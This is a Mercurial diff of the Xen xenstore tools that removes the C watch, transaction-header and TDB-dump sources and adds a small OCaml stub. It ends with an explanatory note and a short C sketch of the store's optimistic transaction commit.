-#ifndef _XENSTORED_TRANSACTION_H
-#define _XENSTORED_TRANSACTION_H
-#include "xenstored_core.h"
-
-struct transaction;
-
-void do_transaction_start(struct connection *conn, struct buffered_data *node);
-void do_transaction_end(struct connection *conn, const char *arg);
-
-struct transaction *transaction_lookup(struct connection *conn, uint32_t id);
-
-/* inc/dec entry number local to trans while changing a node */
-void transaction_entry_inc(struct transaction *trans, unsigned int domid);
-void transaction_entry_dec(struct transaction *trans, unsigned int domid);
-
-/* This node was changed: can fail and longjmp. */
-void add_change_node(struct transaction *trans, const char *node,
-                     bool recurse);
-
-/* Return tdb context to use for this connection. */
-TDB_CONTEXT *tdb_transaction_context(struct transaction *trans);
-
-void conn_delete_all_transactions(struct connection *conn);
-
-#endif /* _XENSTORED_TRANSACTION_H */
diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.c
--- a/tools/xenstore/xenstored_watch.c  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,218 +0,0 @@
-/* 
-    Watch code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/types.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <sys/time.h>
-#include <time.h>
-#include <assert.h>
-#include "talloc.h"
-#include "list.h"
-#include "xenstored_watch.h"
-#include "xs_lib.h"
-#include "utils.h"
-#include "xenstored_domain.h"
-
-extern int quota_nb_watch_per_domain;
-
-struct watch
-{
-       /* Watches on this connection */
-       struct list_head list;
-
-       /* Current outstanding events applying to this watch. */
-       struct list_head events;
-
-       /* Is this relative to connnection's implicit path? */
-       const char *relative_path;
-
-       char *token;
-       char *node;
-};
-
-static void add_event(struct connection *conn,
-                     struct watch *watch,
-                     const char *name)
-{
-       /* Data to send (node\0token\0). */
-       unsigned int len;
-       char *data;
-
-       if (!check_event_node(name)) {
-               /* Can this conn load node, or see that it doesn't exist? */
-               struct node *node = get_node(conn, name, XS_PERM_READ);
-               /*
-                * XXX We allow EACCES here because otherwise a non-dom0
-                * backend driver cannot watch for disappearance of a frontend
-                * xenstore directory. When the directory disappears, we
-                * revert to permissions of the parent directory for that path,
-                * which will typically disallow access for the backend.
-                * But this breaks device-channel teardown!
-                * Really we should fix this better...
-                */
-               if (!node && errno != ENOENT && errno != EACCES)
-                       return;
-       }
-
-       if (watch->relative_path) {
-               name += strlen(watch->relative_path);
-               if (*name == '/') /* Could be "" */
-                       name++;
-       }
-
-       len = strlen(name) + 1 + strlen(watch->token) + 1;
-       data = talloc_array(watch, char, len);
-       strcpy(data, name);
-       strcpy(data + strlen(name) + 1, watch->token);
-       send_reply(conn, XS_WATCH_EVENT, data, len);
-       talloc_free(data);
-}
-
-void fire_watches(struct connection *conn, const char *name, bool recurse)
-{
-       struct connection *i;
-       struct watch *watch;
-
-       /* During transactions, don't fire watches. */
-       if (conn && conn->transaction)
-               return;
-
-       /* Create an event for each watch. */
-       list_for_each_entry(i, &connections, list) {
-               list_for_each_entry(watch, &i->watches, list) {
-                       if (is_child(name, watch->node))
-                               add_event(i, watch, name);
-                       else if (recurse && is_child(watch->node, name))
-                               add_event(i, watch, watch->node);
-               }
-       }
-}
-
-static int destroy_watch(void *_watch)
-{
-       trace_destroy(_watch, "watch");
-       return 0;
-}
-
-void do_watch(struct connection *conn, struct buffered_data *in)
-{
-       struct watch *watch;
-       char *vec[2];
-       bool relative;
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (strstarts(vec[0], "@")) {
-               relative = false;
-               if (strlen(vec[0]) > XENSTORE_REL_PATH_MAX) {
-                       send_error(conn, EINVAL);
-                       return;
-               }
-               /* check if valid event */
-       } else {
-               relative = !strstarts(vec[0], "/");
-               vec[0] = canonicalize(conn, vec[0]);
-               if (!is_valid_nodename(vec[0])) {
-                       send_error(conn, errno);
-                       return;
-               }
-       }
-
-       /* Check for duplicates. */
-       list_for_each_entry(watch, &conn->watches, list) {
-               if (streq(watch->node, vec[0]) &&
-                   streq(watch->token, vec[1])) {
-                       send_error(conn, EEXIST);
-                       return;
-               }
-       }
-
-       if (domain_watch(conn) > quota_nb_watch_per_domain) {
-               send_error(conn, E2BIG);
-               return;
-       }
-
-       watch = talloc(conn, struct watch);
-       watch->node = talloc_strdup(watch, vec[0]);
-       watch->token = talloc_strdup(watch, vec[1]);
-       if (relative)
-               watch->relative_path = get_implicit_path(conn);
-       else
-               watch->relative_path = NULL;
-
-       INIT_LIST_HEAD(&watch->events);
-
-       domain_watch_inc(conn);
-       list_add_tail(&watch->list, &conn->watches);
-       trace_create(watch, "watch");
-       talloc_set_destructor(watch, destroy_watch);
-       send_ack(conn, XS_WATCH);
-
-       /* We fire once up front: simplifies clients and restart. */
-       add_event(conn, watch, watch->node);
-}
-
-void do_unwatch(struct connection *conn, struct buffered_data *in)
-{
-       struct watch *watch;
-       char *node, *vec[2];
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       node = canonicalize(conn, vec[0]);
-       list_for_each_entry(watch, &conn->watches, list) {
-               if (streq(watch->node, node) && streq(watch->token, vec[1])) {
-                       list_del(&watch->list);
-                       talloc_free(watch);
-                       domain_watch_dec(conn);
-                       send_ack(conn, XS_UNWATCH);
-                       return;
-               }
-       }
-       send_error(conn, ENOENT);
-}
-
-void conn_delete_all_watches(struct connection *conn)
-{
-       struct watch *watch;
-
-       while ((watch = list_top(&conn->watches, struct watch, list))) {
-               list_del(&watch->list);
-               talloc_free(watch);
-               domain_watch_dec(conn);
-       }
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.h
--- a/tools/xenstore/xenstored_watch.h  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,35 +0,0 @@
-/* 
-    Watch code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_WATCH_H
-#define _XENSTORED_WATCH_H
-
-#include "xenstored_core.h"
-
-void do_watch(struct connection *conn, struct buffered_data *in);
-void do_unwatch(struct connection *conn, struct buffered_data *in);
-
-/* Fire all watches: recurse means all the children are affected (ie. rm). */
-void fire_watches(struct connection *conn, const char *name, bool recurse);
-
-void dump_watches(struct connection *conn);
-
-void conn_delete_all_watches(struct connection *conn);
-
-#endif /* _XENSTORED_WATCH_H */
diff -r 10a8fae412c5 tools/xenstore/xs.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xs.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,8 @@
+let xs_single connection message_type transaction_id payload =
+  let message = Message.make message_type transaction_id 0l payload in
+  connection#write message;;
+
+let rec xs_read connection =
+  match (connection#read) with
+  | Some m -> m
+  | None -> xs_read connection;;
diff -r 10a8fae412c5 tools/xenstore/xs_tdb_dump.c
--- a/tools/xenstore/xs_tdb_dump.c      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,82 +0,0 @@
-/* Simple program to dump out all records of TDB */
-#include <stdint.h>
-#include <stdlib.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <string.h>
-#include "xs_lib.h"
-#include "tdb.h"
-#include "talloc.h"
-#include "utils.h"
-
-struct record_hdr {
-       uint32_t num_perms;
-       uint32_t datalen;
-       uint32_t childlen;
-       struct xs_permissions perms[0];
-};
-
-static uint32_t total_size(struct record_hdr *hdr)
-{
-       return sizeof(*hdr) + hdr->num_perms * sizeof(struct xs_permissions) 
-               + hdr->datalen + hdr->childlen;
-}
-
-static char perm_to_char(enum xs_perm_type perm)
-{
-       return perm == XS_PERM_READ ? 'r' :
-               perm == XS_PERM_WRITE ? 'w' :
-               perm == XS_PERM_NONE ? '-' :
-               perm == (XS_PERM_READ|XS_PERM_WRITE) ? 'b' :
-               '?';
-}
-
-int main(int argc, char *argv[])
-{
-       TDB_DATA key;
-       TDB_CONTEXT *tdb;
-
-       if (argc != 2)
-               barf("Usage: xs_tdb_dump <tdbfile>");
-
-       tdb = tdb_open(talloc_strdup(NULL, argv[1]), 0, 0, O_RDONLY, 0);
-       if (!tdb)
-               barf_perror("Could not open %s", argv[1]);
-
-       key = tdb_firstkey(tdb);
-       while (key.dptr) {
-               TDB_DATA data;
-               struct record_hdr *hdr;
-
-               data = tdb_fetch(tdb, key);
-               hdr = (void *)data.dptr;
-               if (data.dsize < sizeof(*hdr))
-                       fprintf(stderr, "%.*s: BAD truncated\n",
-                               (int)key.dsize, key.dptr);
-               else if (data.dsize != total_size(hdr))
-                       fprintf(stderr, "%.*s: BAD length %i for %i/%i/%i (%i)\n",
-                               (int)key.dsize, key.dptr, (int)data.dsize,
-                               hdr->num_perms, hdr->datalen,
-                               hdr->childlen, total_size(hdr));
-               else {
-                       unsigned int i;
-                       char *p;
-
-                       printf("%.*s: ", (int)key.dsize, key.dptr);
-                       for (i = 0; i < hdr->num_perms; i++)
-                               printf("%s%c%i",
-                                      i == 0 ? "" : ",",
-                                      perm_to_char(hdr->perms[i].perms),
-                                      hdr->perms[i].id);
-                       p = (void *)&hdr->perms[hdr->num_perms];
-                       printf(" %.*s\n", hdr->datalen, p);
-                       p += hdr->datalen;
-                       for (i = 0; i < hdr->childlen; i += strlen(p+i)+1)
-                               printf("\t-> %s\n", p+i);
-               }
-               key = tdb_nextkey(tdb, key);
-       }
-       return 0;
-}
-
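
A note for readers of the removed xenstored_transaction.c: its commit path is a simple optimistic scheme. A transaction records the global generation counter when it starts, any change to the global store bumps that counter, and a commit fails with EAGAIN if the counter has moved since the transaction started. The following is only a minimal sketch of that idea, not the daemon's code. The names struct txn, txn_start, store_write and txn_commit are hypothetical and do not exist in the Xen tree, and the TDB copy/replace step and the watch firing are left out.

```c
#include <errno.h>

/* Hypothetical stand-in for the daemon's global generation counter:
 * it is bumped on every change to the global store. */
static unsigned int generation;

/* Hypothetical, stripped-down transaction: only the snapshot is kept. */
struct txn {
    unsigned int generation;   /* value of the counter at start */
};

/* Start a transaction by remembering the current generation. */
void txn_start(struct txn *t)
{
    t->generation = generation;
}

/* A write outside any transaction changes the global store directly. */
void store_write(void)
{
    generation++;
}

/* Commit: returns 0 on success, or EAGAIN if the global store changed
 * after txn_start(), in which case the caller is expected to retry. */
int txn_commit(struct txn *t)
{
    if (t->generation != generation)
        return EAGAIN;
    generation++;              /* the commit itself is a change */
    return 0;
}
```

With two transactions started back to back, the first commit succeeds and the second gets EAGAIN, because the first commit moved the counter. The second succeeds once it is restarted. This matches the "FIXME: Merge, rather failing on any change" remark in the removed file: any intervening change fails the commit, even an unrelated one.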